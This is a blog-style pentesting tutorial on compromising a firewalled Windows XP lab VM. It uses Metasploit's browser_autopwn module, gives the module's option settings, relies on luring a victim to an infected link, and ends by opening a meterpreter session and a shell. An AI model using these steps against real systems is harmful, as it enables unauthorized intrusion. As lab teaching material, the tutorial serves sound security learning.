How to hack into a firewalled system

LEGAL DISCLAIMER: This "hack" has been performed by using virtual machines running on my own computer, don't use it against other people's systems, unless you've been given explicit written permission by their owners. I'm not responsible for any unintended use of these instructions.

Pentesters have to find a way to hack into a system.

Most beginner-level tutorials start from exploiting a system configured in a purposely vulnerable way, with a disabled firewall and a series of open ports.

I don't like playing too easy, so I looked for a way to exploit a firewalled system.

For my purposes I used a Windows XP SP3 victim virtual machine and an attacking Kali Linux virtual machine.

An nmap scan performed on the victim system revealed no open ports.

However, I could find a way to hack in by using a browser exploit, auxiliary/server/browser_autopwn.

Once the victim clicks an infected link, this exploits starts trying out a series of possible exploits, until one is successful.

In my case, I had to setup the options for this exploit as follows (to setup an option, you need to use the set command by following this syntax: set PARAMETER VALUE. E.g. set LHOST 192.168.2.12).

LHOST: IP of the Kali Linux machine

SRVPORT 80 (this sends the exploit to Internet port 80. The default option is port 8080, which is used by numerous proxy servers, but it's ineffective in this case).

URIPATH: / (this setting prevents from using random URLs).

Enter show options to make sure your parameters are correct.

NOTE: You might have to install Java on the victim machine for the exploit to succeed. The actual process was fairly longer than what shown in the video, which is accelerated and shortened.

After a while, if the exploit is successful, you should see a message meterpreter session x opened, whereas x is a variable number (see figure below):

This means we managed to hack into the victim machine.

In my case the session ID was 1. You can therefore interact with the victim machine by opening a session on it through the command sessions -i sessionid (in my case it was sessions -i 1, whereas -i stands for interactive shell).

To prove we're actually in, we can enter the shell command, which will open a shell on the victim machine.

The only problem left is how to gain administrative privileges, because the current Windows profile we hacked is a limited account, but I'll deal with it in a coming post.

This post reaffirms that having a firewall is good and necessary but doesn't per se guarantee the security of your network.

Thanks for your time.